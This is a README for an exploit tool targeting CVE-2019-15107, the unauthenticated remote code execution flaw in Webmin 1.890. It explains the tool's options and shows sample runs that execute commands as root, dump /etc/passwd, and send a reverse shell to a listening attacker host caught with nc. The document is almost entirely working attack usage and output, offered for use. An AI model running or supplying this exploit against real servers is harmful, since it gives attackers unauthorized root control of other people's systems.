# CVE-2019-15107 Webmin 1.890 Unauthenticated Remote Code Execution
This script exploits the unauthenticated command execution vulnerability in Webmin 1.890. It lets you execute arbitrary commands on a target Webmin server or obtain a reverse shell.
## Usage
The exploit takes 5 arguments:
```bash
$ python3 test.py -h
usage: test.py [-h] -i IP Address [-p Port number] [-c Command] [--shell] [-x]

Exploit unauthenticated command execution in Webmin 1.890.

options:
  -h, --help            show this help message and exit

required arguments:
  -i IP Address, --ip IP Address
                        Target ip address

optional arguments:
  -p Port number, --port Port number
                        Webmin port(default=10000)
  -c Command, --command Command
                        OS Command to execute (Default=id)
  --shell               Get a reverse shell
  -x, --proxy           Sends requests through Burp Suite proxy at 127.0.0.1:8080.

Example:
  python exploit.py -i 192.168.1.100
  python exploit.py -i 192.168.1.100 -p 10000 -c whoami
  python exploit.py -i 192.168.1.100 -x -c "ls -la"
  python exploit.py -i 192.168.1.100 --shell
```
The only required option is `-i`, which is the IP address of the target.
Running the exploit with only `-i` executes the command `id` against the target on port `10000`:
```bash
$ python3 exploit.py -i 10.200.105.200
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
```
### Command execution
You can specify what command to run using the `-c` or `--command` options:
```bash
$ python3 exploit.py -i 10.200.105.200 -c 'cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[...]
```
### Reverse shell
You can also get a reverse shell by using the `--shell` option.
> You will be prompted to enter your IP address and the listening port:
```bash
$ python3 exploit.py -i 10.200.105.200 --shell
Enter your ip address: 10.50.106.33
Enter your listening port: 9001
[+] Sending a shell to 10.50.106.33:9001...
```
```bash
$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.50.106.33] from (UNKNOWN) [10.200.105.200] 41446
[root@prod-serv ]#
```
### Proxy
Adding the `-x` or `--proxy` option sends the requests through the Burp Suite proxy at 127.0.0.1:8080.
## References
<https://nvd.nist.gov/vuln/detail/cve-2019-15107>